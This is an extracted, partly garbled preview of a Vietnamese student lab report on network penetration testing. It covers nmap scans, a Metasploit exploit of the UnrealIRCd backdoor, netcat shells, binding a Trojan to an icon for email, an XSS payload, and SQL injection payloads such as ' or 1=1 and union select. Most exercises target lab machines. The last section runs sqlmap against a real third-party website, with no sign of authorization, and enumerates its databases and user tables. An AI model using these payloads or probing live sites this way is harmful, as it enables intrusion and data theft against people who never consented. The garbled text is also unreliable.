1. Trang chủ
  2. » Tất cả

Kiểm tra an ninh toàn và xâm nhập mạng

37 1 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 37
Dung lượng 5,13 MB

Nội dung

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG - BÁO CÁO BÀI THỰC HÀNH SỐ MƠN AN TỒN MẠNG ĐỀ BÀI: “Kiểm tra an ninh toàn xâm nhập mạng” Giảng viên hướng dẫn : TS Đặng Minh Tuấn HÀ NỘI - 2021 MỤC LỤC Bài 1: FOOTPRINTING I Tìm hiểu thơng tin Domain II Tìm thơng tin email Bài 2: SCANNING I Sử dụng phần mềm Nmap II Sử dụng phần mềm Nessus để phát vulnerabilities công Metaesploit framework Bài 3: SYSTEM HACKING 10 I Crack password nội 10 Bài 4: TROJAN BACKDOOR 12 I Sử dụng netcat để kết nối shell 12 II Sử dụng netcat để kết nối shell nghịch chuyển để by pass Firewall 12 Bài 5: CÁC PHƯƠNG PHÁP SNIFFER 14 I CAIN 14 II ETERCAP 16 Bài 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DoS 19 I DoS cách sử dụng ping of Death 19 Bài 7: SOCIAL ENGINEERING 20 I Gửi email nặc danh đính kèm Trojan 20 Bài 10: WEB APPLICATION HACKING 21 I Cross Site Scripting 21 Bài 11: SQL INJECTION 22 I Vượt qua khâu xác thực người dùng 22 II Trích xuất liệu từ CSDL 23 III Thêm, sửa, xóa liệu khảo sát 32 Bài 1: FOOTPRINTING I Tìm hiểu thơng tin Domain Ta dùng whois.domaintools.com để tìm kiểm thơng tin domain infosecptit.com: Tìm thơng host dùng chung IP 203.162.10.116: II Tìm thơng tin email Dùng phần mềm “1st email address spider” để tìm thơng tin email có đuôi @vnn.vn: Bài 2: SCANNING I Sử dụng phần mềm Nmap Sử dụng Vmware chạy máy ảo Windows dùng IP động giải địa DHCP từ 192.168.22.128 đến 192.168.22.254 Sử dụng lệnh quét nmap -sS 192.168.22.128-254 ta kết sau: Sử dụng lệnh quét nmap -v -O 192.168.22.130 ta kết trang sau: II Sử dụng phần mềm Nessus để phát vulnerabilities công Metaesploit framework Cấu hình mạng máy victim (Metasploitable2): Cấu hình mạng máy Kali: Ping từ Kali sang victim: Ping từ victim sang Kali: Quét victim Nessus phát cửa hậu : Phát UnrealIRCd Backdoor, máy chủ tin nhắn hoạt động dựa giao thức IRC cổng TCP 6667 Cửa hậu mở nhận chuỗi ký tự “AB” kèm theo lệnh shell hệ điều hành Tiến hành khai thác sử dụng lệnh msfconsole máy Kali: Khai báo thực công: Bài 10: WEB APPLICATION HACKING I Cross Site Scripting Nhập alert("Hello XSS"): Kết thông báo thực thi có XSS: 21 Bài 11: SQL INJECTION I Vượt qua khâu xác thực người dùng Đăng nhập tự Đăng nhập vào tài khoản định Giải thích kết Ở khâu đăng nhập tự ta có câu lệnh SQL là: 22 SELECT TOP * FROM tbl_users WHERE username = 'a' AND password = 'aaaa' or 1=1 ' + Khi câu truy vấn thực tìm hàng tbl_users thỏa mãn hai điều kiện username = ‘a’ password =’aaaa’ 1=1 + Mà 1=1 nên câu truy vấn tìm hàng ta đăng nhập vào tài khoản hàng tbl_users Ở khâu đăng nhập vào tài khoản chi tiết ta có câu lệnh SQL là: SELECT TOP * FROM tbl_users WHERE username = 'david' ' AND password = '1' + Khi câu truy vấn thực tìm hàng có username = ‘david’ cịn điều kiện lại nằm sau dấu ‘ ’ để comment nên bỏ qua + Trong tbl_user có username = ‘david’ nên ta đăng nhập vào hệ thống với tài khoản david mà khơng cần mật II Trích xuất liệu từ CSDL Tìm số trường câu truy vấn trang: ip%' order by 1; 23 ip%' order by 2; ip%' order by 3; 24 ip%' order by 4;  Có trường ip%' union select '1', '2', '3'; 25 Hiển thị thông tin hệ quản trị CSDL hệ điều hành Trích xuất danh sách bảng CSDL 26 Trích xuất danh sách trường bảng: tbl_test 27 tbl_products tbl_administrators 28 students Trích xuất liệu bảng tbl_user 29 tbl_test tbl_products 30 tbl_administrators students 31 III Thêm, sửa, xóa liệu khảo sát 3.1 Sửa Sửa password david thành test kết quả: 32 3.2 Thêm Thêm tài khoản tom kết quả: 33 Xóa Xóa tài khoản tom kết Khảo sát trang web mạng có lỗi chèn mã SQL (khơng sửa/xóa liệu) Thực hành trang http://tapiocafeedfood.com sử dụng SQLMap Kali Linux Lệnh: sqlmap -u "http://tapiocafeedfood.com/?php=product_detail&id=300" – dbs 34 Kết ta nhận hai bảng dbs: “information_schema” “vietfarmgr_ha” Tiếp tục sử dụng lệnh: sqlmap -u "http://tapiocafeedfood.com/?php=product_detail&id=300" tables -D vietfarmgr_ha để truy cập vào trường database ta nhận trường: Kết ta tìm trường: tbl_config, tbl_content, tbl_content_category, tbl_product, tbl_product_category, tbl_product_new, | tbl_product_special, tbl_user, tbl_visitor 35 ... 192.168.22.130 ta kết trang sau: II Sử dụng phần mềm Nessus để phát vulnerabilities cơng Metaesploit framework Cấu hình mạng máy victim (Metasploitable2): Cấu hình mạng máy Kali: Ping từ Kali sang victim:... 19 Bài 7: SOCIAL ENGINEERING I Gửi email nặc danh đính kèm Trojan Dùng Ultimate Spreading Tool để gắn Trojan vào icon Chọn Binder chọn find icon trojan muốn ghép chọn build: File build xong thành... xác thực người dùng Đăng nhập tự Đăng nhập vào tài khoản định Giải thích kết Ở khâu đăng nhập tự ta có câu lệnh SQL là: 22 SELECT TOP * FROM tbl_users WHERE username = ''a'' AND password = ''aaaa''

Ngày đăng: 26/02/2023, 15:24

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w